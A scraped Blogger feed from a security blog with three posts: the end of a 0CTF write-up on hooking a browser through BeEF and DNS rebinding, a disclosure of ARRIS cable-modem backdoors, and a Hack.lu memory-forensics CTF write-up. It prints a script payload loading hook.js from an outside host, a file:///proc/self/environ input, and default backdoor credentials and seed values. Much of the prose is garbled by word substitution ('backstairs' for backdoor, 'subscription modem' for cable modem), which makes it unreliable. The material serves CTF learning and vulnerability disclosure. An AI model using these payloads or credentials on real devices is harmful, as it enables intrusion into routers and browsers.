href="https://github.com/beefproject/beef">BeEF</a>, so we could fingerprint his device, platform, plugins and components.<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-le7BwVqBft0/VuXAJsuaVoI/AAAAAAAABTA/Z6X8QSakF_0lCgYkTBC1VBO63k36e2IkA/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B15.19.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://2.bp.blogspot.com/-le7BwVqBft0/VuXAJsuaVoI/AAAAAAAABTA/Z6X8QSakF_0lCgYkTBC1VBO63k36e2IkA/s400/Screen%2BShot%2B2016-03-13%2Bat%2B15.19.50.png" width="256" /></a></div><br />There was nothing interesting here, a custom user-agent and no known vulnerable component. We enumerated the chars wonted by the server with the pursuit script:<br /><br /><script src="https://gist.github.com/bmaia/255d3f4210998ed19c3b.js"></script> Unfortunately, the server was rejecting special chars like spaces (%20 and +) and there was no writ injection signal. Our evil plan to input&nbsp;<b>--disable-web-security $URL</b> to disable Chrome's SOP didn't work so we had to find new ways to retrieve the secrets.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gySVVcKBD_I/VuXRHKkOpPI/AAAAAAAABTs/BjYGrAdmrTY5E7Xq20rPz6Th2sza3ZVZA/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B17.43.37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://1.bp.blogspot.com/-gySVVcKBD_I/VuXRHKkOpPI/AAAAAAAABTs/BjYGrAdmrTY5E7Xq20rPz6Th2sza3ZVZA/s640/Screen%2BShot%2B2016-03-13%2Bat%2B17.43.37.png" width="640" /></a></div><br />We moreover thought well-nigh using data:uri and file schemes to load a malicious script/webpage, but it wouldn't help us to shirk the SOP. We tried to input URL's like <b>&lt;html&gt;&lt;script/**/src='http://www.example.com:8000/hook.js'&gt;&lt;/script&gt;&lt;/html&gt;</b> and <b>file:///proc/self/environ</b> (setting custom headers with a malicious HTML), but that is moreover known not to work on modern browsers.<br /><br /><br /><b>DNS Rebinding</b><br /><br />After some discussion, we came to the conclusion that we needed to perform a DNS Rebinding attack. <a href="https://twitter.com/devttyS0">devttys0</a> presented well-nigh <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Heffner/DEFCON-18-Heffner-Routers.pdf">this matriculation of vulnerabilities at DEFCON 18</a> and <a href="https://twitter.com/mikispag">@mikispag</a> recently wrote a detailed post describing how to use <a href="https://miki.it/blog/2015/4/20/the-power-of-dns-rebinding-stealing-wifi-passwords-with-a-website/">DNS rebinding to steal WiFi passwords</a>.<br /><br />DNS rebinding is a technique that can be used to perform a violate of same-origin restrictions, enabling a malicious website to interact with a variegated domain. The possibility of this wade arises considering the segregations in the SOP are based primarily on domain name and port, whereas the ultimate wordage of HTTP requests involves converting domain names into IP addresses.<br /><br />We had some issues at first considering we tried to use the self-ruling DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to vaccinate the user's browser when using the service.<br /><br />In order to make our life miserable, the rencontre monkey would scan the site for two minutes only: we moreover could't use the DNS services from Namecheap considering the minimum TTL time is 60 seconds.<br /><br /><b><br /></b><b>Attack Phase</b><br /><br />After deciding to set up the DNS server on our own, we came with the pursuit wade scenario:<br /><br />1) User visits the whinge vaccinate page at http://ctf.example.com:8080 (IP 1.2.3.4).<br /><br />2) Webpage will load BeEF javascript vaccinate and his browser will wilt a zombie.<br /><br />3) We perform a DNS Rebind to transpiration the A Record from 1.2.3.4 to 127.0.0.1. <a href="https://twitter.com/danilonc">@danilonc</a> set the BIND Zone file with a low TTL (1 sec) and replaced the wordplay (lines 14-15) as soon as the browser got hooked.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-yPoNfQS0BI4/VuXtkIuDIbI/AAAAAAAABU0/rFUAhMG2o5M6aRt5gqIfaRfkaPCik7IGw/s1600/bind.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://2.bp.blogspot.com/-yPoNfQS0BI4/VuXtkIuDIbI/AAAAAAAABU0/rFUAhMG2o5M6aRt5gqIfaRfkaPCik7IGw/s400/bind.PNG" width="400" /></a></div><br />4) Perform a CORS request using BeeF's "Test CORS Request" module.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-Ruvlj-AUCbg/VuXs2JjVq1I/AAAAAAAABUo/khrudtrkcGccRUUu4l81ca5RVgeHQCHUA/s1600/Screen%2BShot%2B2016-03-12%2Bat%2B18.24.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://3.bp.blogspot.com/-Ruvlj-AUCbg/VuXs2JjVq1I/AAAAAAAABUo/khrudtrkcGccRUUu4l81ca5RVgeHQCHUA/s400/Screen%2BShot%2B2016-03-12%2Bat%2B18.24.15.png" width="400" /></a></div><br />Here's a small diagram of the attack:<br /><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-KOesqzu78qk/VuXsH1Nna2I/AAAAAAAABUc/lmOjBnyHtbMOGBFEJ3Gcz9sIFN8AwgevQ/s1600/rebinding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://1.bp.blogspot.com/-KOesqzu78qk/VuXsH1Nna2I/AAAAAAAABUc/lmOjBnyHtbMOGBFEJ3Gcz9sIFN8AwgevQ/s640/rebinding.png" width="640" /></a></div><br /><br />After a couple of tries we finally managed to get the flag:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PQOzl7xuh5E/VuXsoq1sfyI/AAAAAAAABUg/uyQM5CljMG47HNTmdcWEMTL2soPMZUKVA/s1600/Screen%2BShot%2B2016-03-12%2Bat%2B18.46.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://1.bp.blogspot.com/-PQOzl7xuh5E/VuXsoq1sfyI/AAAAAAAABUg/uyQM5CljMG47HNTmdcWEMTL2soPMZUKVA/s640/Screen%2BShot%2B2016-03-12%2Bat%2B18.46.56.png" width="640" /></a></div><br />Flag:&nbsp;<b>0ctf{monkey_likes_banananananananaaaa}</b><br /><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com2tag:blogger.com,1999:blog-3296471108082693838.post-70197294034045289562015-11-19T11:07:00.000-02:002015-11-20T00:02:04.788-02:00ARRISSubscriptionModem has aBackstairsin the Backdoor<span style="font-family: inherit;">A couple of months ago, some friends invited me to requite a talk at <a href="http://www.nullbyte-con.org/">NullByte Security Conference</a>. I started to study well-nigh some <strike>embedded device</strike> junk hacking hot topics and decided to talk well-nigh subscription modem security. <a href="https://twitter.com/drspringfield">Braden Thomas</a>&nbsp;keynoted at Infiltrate 2015 discussing well-nigh <a href="https://bitbucket.org/drspringfield/cabletables/downloads/PracticalAttacksOnDOCSIS.pdf">Practical Attacks on DOCSIS</a>&nbsp;so, yeah, subscription modem hacking is still mainstream.</span><br /><br />On November 21st I'll be at Salvador speaking on "Hacking subscription modems: The Later Years". It's not a talk well-nigh theft of service and getting self-ruling Internet access. I'll focus on the security of the subscription modems, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmwares. Spoiler Alert: everything's really really bad.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DVOZdgrwcQM/VkqIoEZRIhI/AAAAAAAABPg/5rSv9XcPLbE/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-DVOZdgrwcQM/VkqIoEZRIhI/AAAAAAAABPg/5rSv9XcPLbE/s320/Capturar.PNG" width="320" /></a></div><br />Securing subscription modems is increasingly difficult than other embedded devices because, on most cases, you can’t segregate your own device/firmware and software updates are scrutinizingly entirely controlled by your ISP.<br /><br />While researching on the subject, I found a previously undisclosed backstairs on ARRIS subscription modems, well-expressed many of their devices including TG862A, TG862G, DG860A. As of this writing, Shodan searches indicate that the backstairs affects over 600.000 externally wieldy hosts and the vendor did not state whether it's going to fix it yet.<br /><br /><b><br /></b><b>ARRIS Backdoors</b><br /><br />ARRIS SOHO-grade subscription modems contain an undocumented library (libarris_password.so) that acts as a backdoor, permitting privileged logins using a custom password.<br /><br />The pursuit files load the backstairs library on ARRIS TG862A Firmware TS0705125D_031115_MODEL_862_GW (released on 2015):<br /><br /><div class="code">/usr/sbin/arris_init<br />/usr/sbin/dimclient<br />/usr/sbin/docsis_mac_manager<br />/usr/sbin/ggncs<br />/usr/sbin/gw_api<br />/usr/sbin/mini_cli<br />/usr/sbin/pacm_snmp_agent<br />/usr/sbin/snmp_agent_cm<br />/usr/www/cgi-bin/adv_pwd_cgi<br />/usr/www/cgi-bin/tech_support_cgi</div><br /><a href="http://www.borfast.com/projects/arris-password-of-the-day-generator">ARRIS password of the day</a>&nbsp;is a remote backstairs known since 2009. It uses a DES encoded seed (set by the ISP using the arrisCmDoc30AccessClientSeed MIB) to generate a daily backstairs password. The default seed is MPSJKMDHAI and guess what - many ISPs won't scarecrow waffly it at all.<br /><br />The backstairs worth can be used to enable Telnet and SSH remotely via the subconscious HTTPLegalisticinterface "<a href="http://192.168.100.1/cgi-bin/tech_support_cgi">http://192.168.100.1/cgi-bin/tech_support_cgi</a>" or via custom SNMP MIBs.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MSNdFWF_mXI/VkqI4qNOEAI/AAAAAAAABPo/L7pKxxHvzEw/s1600/Screenshot-Touchstone%2BTechnical%2BSupport%2B-%2BMozilla%2BFirefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://2.bp.blogspot.com/-MSNdFWF_mXI/VkqI4qNOEAI/AAAAAAAABPo/L7pKxxHvzEw/s320/Screenshot-Touchstone%2BTechnical%2BSupport%2B-%2BMozilla%2BFirefox.png" width="320" /></a></div><br /><br />The default password for the SSH user 'root' is 'arris'. When you wangle the telnet session or demonstrate over SSH, the system spawns the 'mini_cli' shell asking for the backstairs password.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gzcCa0S4ZYU/Vk0t6WPZ_cI/AAAAAAAABRo/7tTuWIEZnxM/s1600/telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="319" src="http://4.bp.blogspot.com/-gzcCa0S4ZYU/Vk0t6WPZ_cI/AAAAAAAABRo/7tTuWIEZnxM/s320/telnet.png" width="320" /></a></div><br />When you log using the password of the day, you are redirected to a restricted technician shell ('/usr/sbin/cli')<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-NHsPa-1kh7o/Vk0gfzRpYUI/AAAAAAAABQw/uFU0GTYQLBw/s1600/restricted0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="460" src="http://4.bp.blogspot.com/-NHsPa-1kh7o/Vk0gfzRpYUI/AAAAAAAABQw/uFU0GTYQLBw/s640/restricted0.PNG" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Restricted shells are ;restricted<br /><br /></td></tr></tbody></table>In order to understand how the backstairs works, I built an <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">Puma5 toolchain (ARMEB)</a> and navigate compiled some useful tools like strace, tcpdump and gdbserver. I hosted them on my Github, get them here:<br /><br />-&nbsp;<a href="https://github.com/bmaia/cross-utils/tree/master/armeb">https://github.com/bmaia/cross-utils/tree/master/armeb</a><br /><br />While analyzing the backstairs library and the restricted shells, I found an interesting lawmaking on the hallmark check:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-iahipI2sMOo/Vk0nm7Vg3tI/AAAAAAAABRE/EA79sfWFJVQ/s1600/backdoors-final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="http://2.bp.blogspot.com/-iahipI2sMOo/Vk0nm7Vg3tI/AAAAAAAABRE/EA79sfWFJVQ/s640/backdoors-final.png" width="640" /></a></div><br /><br />Yes, they put a backstairs in the backstairs (<a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel from Dlink</a> is sure to be envy). The undocumented backstairs password is based on the last five digits from the modem's serial number. You get a full busybox shell when you log on the Telnet/SSH session using these passwords.<br /><br />The vendor asked not to unroll details well-nigh the password generation algorithm. I'm really relieved knowing that <a href="https://twitter.com/todb/status/648956328292057088">those villainous guys from Metasploit</a> won't be worldly-wise to reverse this in a timely manner.<br /><div><br /></div><br /><b>Vulnerability, Disclosure and Marketing</b><br /><br />Of course, we need a logo so the media can report well-nigh this with fancy graphs as well as vendors could distribute customized t-shits at Blackhat.<br /><br />What I like most well-nigh <a href="https://twitter.com/lcamtuf">lcamtuf</a> is how visionary he is. While people were still writing dumb fuzzers, he <strike>wrote AFL</strike>&nbsp;performed a detailed <a href="https://lcamtuf.blogspot.com/2015/01/technical-analysis-of-qualys-ghost.html">Technical wringer of Qualys' GHOST</a>. Based on his analysis, I hired a couple of marketing specialists to find out the weightier way to unroll the ARRIS backdoor.<br /><br />What do we have here?<br /><br />- Multiple backdoors permitting full remote wangle to ARRISSubscriptionmodems<br />- An wangle key that is generated based on theSubscriptionmodem's serial number<br /><br />After a thoughtful analysis, the marketing committee well-considered w00tsec members to write a <a href="https://en.wikipedia.org/wiki/Keygen">Keygen</a>. In order to write a Keygen, we need a leet ascii art and a tomfool chiptune. The chosen font was <a href="http://sourceforge.net/p/ansiconverter/blog/2014/07/thedraw-fonts-collection-revamp-and-extension/">ROYAFNT1.TDF</a>, from the legendary versifier <a href="https://en.wikipedia.org/wiki/Superior_Art_Creations">Roy/SAC</a>&nbsp;and the chiptune is <a href="https://www.youtube.com/watch?v=Syc2NnPNnZs">Toilet Story 5</a>, by <a href="http://modarchive.org/index.php?request=view_profile&amp;query=68760">Ghidorah</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XS_jwjNWqpo/VkqONoRel3I/AAAAAAAABQU/9LOJWamfAnY/s1600/run2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="http://4.bp.blogspot.com/-XS_jwjNWqpo/VkqONoRel3I/AAAAAAAABQU/9LOJWamfAnY/s640/run2.png" width="640" /></a></div><br /><br />Here's the POC (make sure you turn the sound on):<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/pmKd69-KyhQ/0.jpg" frameborder="0" height="400" src="https://www.youtube.com/embed/pmKd69-KyhQ?feature=player_embedded" width="660"></iframe></div><br /><br /><b>Conclusion</b><br /><b><br /></b>I reported these flaws to <a href="https://www.cert.org/vulnerability-analysis/">CERT/CC</a> on 2015-09-13 but we didn't receive much feedback from the vendor.&nbsp;<a href="https://www.cert.org/vulnerability-analysis/">CERT/CC&nbsp;</a>was very helpful and responsive (10/10 would unroll again!). I was asked not to release the&nbsp;POCs immediately so I'm going to wait for the vendor to "fix" the issue.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ur0HSoXiBcE/VNff-8DqvQI/AAAAAAAAA40/pxdqS4lQ9SY/s1600/tweet2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://3.bp.blogspot.com/-ur0HSoXiBcE/VNff-8DqvQI/AAAAAAAAA40/pxdqS4lQ9SY/s400/tweet2.png" width="400" /></a></div><br />CERT/CC set a <a href="https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm">disclosure policy of 45 days</a> long ago. They waited for increasingly than 65 days for them to "fix" it but ARRIS didn't remove the backdoors in a timely manner. Someone needs to update the Responsible Disclosure RFC and include a note describing that vendors shall lose disclosure points whenever they plant a backstairs on the device (ARRIS modems have a third backstairs too, trammels the <a href="http://console-cowboys.blogspot.com/2014/09/arris-cable-modem-backdoor-im.html">ConsoleCowboys Blog</a>).<br /><br />I'm pretty sure bad guys had been exploiting flaws on these devices for some time (just search for <a href="https://twitter.com/search?q=arris%20dns&amp;src=typd">ARRIS DNS on Twitter</a>, for example). We need increasingly people bypassing EULAs and reversing end-user software and firmware. If you haven't heard well-nigh the <a href="http://firmware.re/">Firmware.RE</a>, trammels them right now. A broader view on firmwares is not only beneficial, but necessary to discover new vulnerabilities and backdoors, correlating variegated device families and showing how vulnerabilities reappear wideness variegated products.<br /><br />To all the vendors out there, I would like to finish this post by quoting <span id="goog_1417640033"></span><a href="https://twitter.com/daveaitel">@daveitel</a>:<span id="goog_1417640034"></span><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://www.csoonline.com/article/2997254/security-industry/hacked-opinions-the-legalities-of-hacking-dave-aitel.html"><img border="0" height="167" src="http://4.bp.blogspot.com/-409Y3m5XyRU/VkqNAtdepYI/AAAAAAAABQI/uz0V3u6U1IU/s400/knowing.png" width="400" /></a></div><br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com168tag:blogger.com,1999:blog-3296471108082693838.post-1288766731761081932015-10-22T06:02:00.001-02:002015-12-09T01:03:30.457-02:00Hack.lu 2015 CTF Write Up: Dr. Bob (Forensic 150)<a href="http://2015.hack.lu/ctf/">Hack.lu 2015 CTF</a>&nbsp;was organised by <a href="https://twitter.com/fluxfingers">fluxfingers</a>&nbsp;during October 20-22. It's one of the coolest CTFs around, the only drawback is that it runs during week days (hey guys patch this for the next years). My team <a href="https://ctftime.org/team/10288">TheGoonies</a> ranked #59th, which is not bad considering we only played part-time.<br /><br />The task Dr. Bob was the one I found most interesting as it included disk forensics, memory forensics and vital crypto tasks.<br /><br /><b>Task: Dr. Bob&nbsp;(Forensic 150)</b><br /><br /><div class="code">There are elections at the moment for the representative of the students and the winner will be spoken tomorrow by the throne of elections Dr. Bob. The local schoolyard gang is gambling on the winner and you could really use that uneaten cash. Luckily, you are worldly-wise to hack into the mainframe of the school and get a reprinting of the virtual machine that is used by Dr. Bob to store the results. The desired information is in the file /home/bob/flag.txt, easy as that.</div><div><br /></div><div><div>Download: <a href="https://school.fluxfingers.net/static/chals/dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz">dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz</a></div></div><div><br /></div>The file provided is a VirtualBox image in a saved state.Equalto the rencontre instructions, we have to retrieve the flag from the user home folder. The VM starts on a login terminal of what seems to be a Linux distro.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-E7EJcLEF4Os/VihFkIXg5MI/AAAAAAAABLI/vSuJpCZbaeM/s1600/distro.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://1.bp.blogspot.com/-E7EJcLEF4Os/VihFkIXg5MI/AAAAAAAABLI/vSuJpCZbaeM/s400/distro.PNG" width="400" /></a></div><br />The easiest route here is to convert the VDI image to raw, mount and pericope the key from the home folder. VirtualBox has a builtin tool to convert VDI to raw and it's as simple as:<br /><br /><div class="code">C:\Program Files\Oracle\VirtualBox\VBoxManage.exe internalcommands converttoraw c:\ctf\home\dr_bob\.VirtualBox\Safe\Safe.vdi c:\ctf\safe.dd</div><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-ERN2q3AU0cA/VihGvf6yMTI/AAAAAAAABLk/CAUpRfOyQxA/s1600/dd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="http://3.bp.blogspot.com/-ERN2q3AU0cA/VihGvf6yMTI/AAAAAAAABLk/CAUpRfOyQxA/s400/dd.PNG" width="400" /></a></div><br />Let's identify the raw image and mount it externally:<br /><div class="code">sudo fdisk -lu safe.dd </div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-z4EQ8YJU8rU/VihGhhyUhnI/AAAAAAAABLc/AOa4BL-viMM/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://4.bp.blogspot.com/-z4EQ8YJU8rU/VihGhhyUhnI/AAAAAAAABLc/AOa4BL-viMM/s400/Screenshot-Terminal.png" width="400" /></a></div><br /><div class="code">sudo losetup -o 1048576 /dev/loop0 safe.dd</div><div class="code">sudo lvmdiskscan</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xDUtH-eC9Gc/VihHS8QNV0I/AAAAAAAABLs/CSLG13SrJcg/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="http://4.bp.blogspot.com/-xDUtH-eC9Gc/VihHS8QNV0I/AAAAAAAABLs/CSLG13SrJcg/s400/Screenshot-Terminal-1.png" width="400" /></a></div><br />There are two interesting devices: /dev/vg/root and /dev/vg/home, let's 1 - mount the home folder, 2 - grab the flag and 3 - PROFIT!!!<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ISxFDyWXF4s/VihHvRpuuKI/AAAAAAAABL0/2Yfvcy2Wkvc/s1600/disk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-ISxFDyWXF4s/VihHvRpuuKI/AAAAAAAABL0/2Yfvcy2Wkvc/s320/disk.png" width="320" /></a></div><br />Oh noes, the disk is encrypted... I couldn't find any useful data on the root device (/dev/vg/root). I tried to one-liner some local password hashes but I didn't get anything and logs/history files didn't reveal any secrets. Time to unleash some CSI skills and perform live memory forensics.<br /><br /><b><br /></b><b>Memory Forensics: Rekall</b><br /><br />Unlike VMWare virtual machines, VirtualBox does not offer an easy-to-use memory dump (as far as I know). What do we do now? It's time to perform <a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">VM introspection with Rekall</a>.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-gLw0EQIzO44/Vig5ZlnBwRI/AAAAAAAABK4/5ngcJgMvdmc/s1600/inception.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="http://3.bp.blogspot.com/-gLw0EQIzO44/Vig5ZlnBwRI/AAAAAAAABK4/5ngcJgMvdmc/s400/inception.jpg" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">MemoryWringerInception</td></tr></tbody></table>Rekall is the first memory framework to support transparent introspection of VMs with any host-guest OS combination and is self-sustaining of the virtualization software layer.<br /><br /><b><br /></b><b>Building the Profile</b><br /><b><br /></b>Linux support in Rekall requires a tailoured profile to the running kernel as well as the System map file. The profile file contains all the debugging symbols extracted into a Rekall standard profile format. To generate this file, it is necessary to build a kernel module with debugging symbols enabled, and then parse the DWARF debugging symbols.<br /><br />The operating system is a Debian 7.9 i686, with 3.2.0-4-486 Kernel.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TXY2lx_4ADM/VihM0aqY4sI/AAAAAAAABME/_5bOeSwWsgQ/s1600/deb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="http://1.bp.blogspot.com/-TXY2lx_4ADM/VihM0aqY4sI/AAAAAAAABME/_5bOeSwWsgQ/s400/deb.png" width="400" /></a></div><br />The <a href="https://github.com/google/rekall/tree/master/tools/linux">Linux Guide</a> from <a href="https://github.com/google/rekall/tree/master/tools/linux">rekall repository</a> is pretty straightforward. I downloaded a <a href="http://cdimage.debian.org/cdimage/archive/7.9.0/i386/iso-dvd/">Debian 7.9 i386 ISO</a>, installed it on a wipe system, installed the Kernel headers from the target VM and built the respective profiles. I mirrored them here:<br /><div><ul><li><a href="https://github.com/bmaia/rekall-profiles">https://github.com/bmaia/rekall-profiles</a></li></ul></div><div><b><br /></b></div><div><b>MemoryWringerInception</b></div><br />Now that we have the proper profile, we can run VirtualBox, start the VM and perform live forensics on the guest machine.<br /><br />The <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/VmScan.html">vmscan plugin</a> scans the physical memory attempting to find hypervisors and group them together logically as virtual machines.<br /><br />It's possible to run plugins on any VM by using the --ept (<a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">Extended Page Tables</a>) parameter on the writ line. To run a rekall plugin on a VM that vmscan found, invoke rekall as you normally would, but add --ept EPT_VALUE as a parameter.<br /><br /><div class="code">rekal -f \\.\pmem vmscan --live</div><div class="code">rekal.exe -f \\.\pmem --profile Debian-3.2.0-4-486.zip --ept 0x1ECC0701E</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-8Q412GTpnDA/VihY3h-AnRI/AAAAAAAABMg/-Mw6c_dCUqM/s1600/success.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="http://3.bp.blogspot.com/-8Q412GTpnDA/VihY3h-AnRI/AAAAAAAABMg/-Mw6c_dCUqM/s400/success.PNG" width="400" /></a></div><br />I tried to use the wiring <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/Linux/">Plugins that supports Linux analysis</a>, but none of them revealed the secrets necessary to decrypt the disk.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4l8hqQDOUz0/VihadQUZrAI/AAAAAAAABM0/Bj21f-HG9d4/s1600/netstat.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="http://3.bp.blogspot.com/-4l8hqQDOUz0/VihadQUZrAI/AAAAAAAABM0/Bj21f-HG9d4/s400/netstat.PNG" width="400" /></a></div><br />After some time I decided to take a variegated tideway and <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/ImageCopy.html">dump the full memory</a> from the Guest VM and whittle for some secrets.<br /><br /><div class="code">imagecopy output_image='memdump.raw'</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-U1TFBJheOD0/VihdFY2x45I/AAAAAAAABNA/ipOLBGyx6ZI/s1600/memdump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="http://4.bp.blogspot.com/-U1TFBJheOD0/VihdFY2x45I/AAAAAAAABNA/ipOLBGyx6ZI/s400/memdump.PNG" width="400" /></a></div><br /><b><br /></b><b>Extracting AES Keys from the Memory Dump</b><br /><br />You can use tools like <a href="https://github.com/simsong/bulk_extractor">bulk_extractor</a> and <a href="http://jessekornblum.livejournal.com/269749.html">findaes</a> to pericope AES keys from memory dumps. These programs work by scarification the images and eliminating anything which is not a valid AES key schedule.<br /><br /><div class="code">./findaes memdump.raw</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-dRCcBuIghss/VihexUwvL7I/AAAAAAAABNM/qnhpIEJWarA/s1600/findaes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="http://1.bp.blogspot.com/-dRCcBuIghss/VihexUwvL7I/AAAAAAAABNM/qnhpIEJWarA/s400/findaes.png" width="400" /></a></div><br />The tools found an AES-128 key, and I now needed to recreate this policies on a lab to make sure that it was the encryption master-key.&nbsp;I set up an encrypted volume on a Debian installation and dumped the master keys using cryptsetup:<br /><br /><div class="code">cryptsetup luksDump --dump-master-key /dev/sda5</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-V2eRoQQtilo/Vihf8lQQyRI/AAAAAAAABNY/hmFDexV1XiQ/s1600/b1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="http://1.bp.blogspot.com/-V2eRoQQtilo/Vihf8lQQyRI/AAAAAAAABNY/hmFDexV1XiQ/s400/b1.png" width="400" /></a></div><br />After that, I dumped the operating system memory and used bulk_extractor to search for AES Keys:<br /><br /><div class="code">bulk_extractor memdump.raw</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-5zIXQVR9N6g/VihgSxcTWDI/AAAAAAAABNg/GPI_2t_Pujs/s1600/b2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="http://1.bp.blogspot.com/-5zIXQVR9N6g/VihgSxcTWDI/AAAAAAAABNg/GPI_2t_Pujs/s400/b2.png" width="400" /></a></div><br />The AES256 key matches with the MK dump, what brings us to the final step.<br /><br /><b><br /></b><b>Decrypting LUKS volume using the Master Key</b><br /><br />Now that we have the AES Key, all we need to do is follow this guide -&nbsp;<a href="http://b87.nl/cryptsetup-and-the-master-key">Cryptsetup and the master key</a>&nbsp;- and decrypt '/dev/vg/home'. There's no command-line to decrypt the disk using the master-key, everything is kind of hackish (you need to untruthful the headers and create a new one using the key).<br /><br /><div class="code">sudo losetup -o 1048576 /dev/loop1 safe.dd</div><div class="code">cryptsetup -v luksDump /dev/vg/home</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EgySSSQ7PWQ/Vihjvd-L49I/AAAAAAAABNs/0yj5HkthMkM/s1600/Screenshot-Terminal-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="http://2.bp.blogspot.com/-EgySSSQ7PWQ/Vihjvd-L49I/AAAAAAAABNs/0yj5HkthMkM/s400/Screenshot-Terminal-2.png" width="400" 